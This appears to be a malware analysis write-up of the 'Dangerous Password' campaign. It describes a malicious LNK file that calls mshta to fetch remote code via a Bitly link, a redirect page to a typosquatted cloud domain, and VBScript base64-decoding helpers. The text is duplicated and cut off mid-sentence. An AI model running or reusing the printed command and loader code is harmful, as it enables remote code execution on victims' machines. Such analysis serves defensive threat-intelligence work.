Dangerous Password
Contents
## Dangerous Password
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is a executable RAR archive content a edited lnk, this writes the file in the temp folder and executes the remote code by mshta call.</h6>
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Pictures/Lnk_File.png">
<table>
<tr>
<td>MachineID</td>
<td>IconFileName</td>
<td>CommandLineArguments</td>
<td>WorkingDirectory</td>
<td>LocalBasePath</td>
<td>TargetFileDOSName</td>
<td>TargetFileSize</td>
<td>CreateDate</td>
<td>ModifyDate</td>
<td>FileAttributes</td>
</tr>
<tr>
<td>desktop-mn3id9</td>
<td>C:\Windows\System32\shell32.dll</td>
<td>/c start /b %SystemRoot%\System32\mshta https[:]//bit.ly/2UiZH6V</td>
<td>C:\Users\Public\Music\</td>
<td>C:\Windows\System32\cmd.exe</td>
<td>cmd.exe</td>
<td>280064</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>Archive</td>
</tr>
</table>
<h6>The Bitly link redirects to a fake cloud solution which usurps a legitim service. (.club instead of .fr)</h6>
```html
<html>
<head><title>Bitly</title></head>
<body><a href="http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D">moved here</a></body>
</html>
```
<h6>This executes a following Visual Basic code, the first two functions for decode the base 64 and create a stream object for manipulate data.</h6>
```vb
<script language="vbscript">
function dbsc(tds)
with CreateObject("Msxml2.DOMDocument").CreateElement("mic")
.DataType="bin.base64"
.Text=tds
dbsc=appc(.NodeTypedValue)
end with
end function
function appc(ByVal bin)
with CreateObject("ADODB.Stream")
.Type=1
.Open
.Write bin
.Position=0
.Type=2
.CharSet="utf-8"
appc=.ReadText
.Close
end with
end function
```
<h6>Then this copy in the temp folder a file with a password and show it for …
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is a executable RAR archive content a edited lnk, this writes the file in the temp folder and executes the remote code by mshta call.</h6>
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Pictures/Lnk_File.png">
<table>
<tr>
<td>MachineID</td>
<td>IconFileName</td>
<td>CommandLineArguments</td>
<td>WorkingDirectory</td>
<td>LocalBasePath</td>
<td>TargetFileDOSName</td>
<td>TargetFileSize</td>
<td>CreateDate</td>
<td>ModifyDate</td>
<td>FileAttributes</td>
</tr>
<tr>
<td>desktop-mn3id9</td>
<td>C:\Windows\System32\shell32.dll</td>
<td>/c start /b %SystemRoot%\System32\mshta https[:]//bit.ly/2UiZH6V</td>
<td>C:\Users\Public\Music\</td>
<td>C:\Windows\System32\cmd.exe</td>
<td>cmd.exe</td>
<td>280064</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>2020-02-14 15:47:41 (+01:00)</td>
<td>Archive</td>
</tr>
</table>
<h6>The Bitly link redirects to a fake cloud solution which usurps a legitim service. (.club instead of .fr)</h6>
```html
<html>
<head><title>Bitly</title></head>
<body><a href="http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/OIlDzMTGaoc57qLEkLRpQt5RK8enWJAvRA%3D%3D">moved here</a></body>
</html>
```
<h6>This executes a following Visual Basic code, the first two functions for decode the base 64 and create a stream object for manipulate data.</h6>
```vb
<script language="vbscript">
function dbsc(tds)
with CreateObject("Msxml2.DOMDocument").CreateElement("mic")
.DataType="bin.base64"
.Text=tds
dbsc=appc(.NodeTypedValue)
end with
end function
function appc(ByVal bin)
with CreateObject("ADODB.Stream")
.Type=1
.Open
.Write bin
.Position=0
.Type=2
.CharSet="utf-8"
appc=.ReadText
.Close
end with
end function
```
<h6>Then this copy in the temp folder a file with a password and show it for …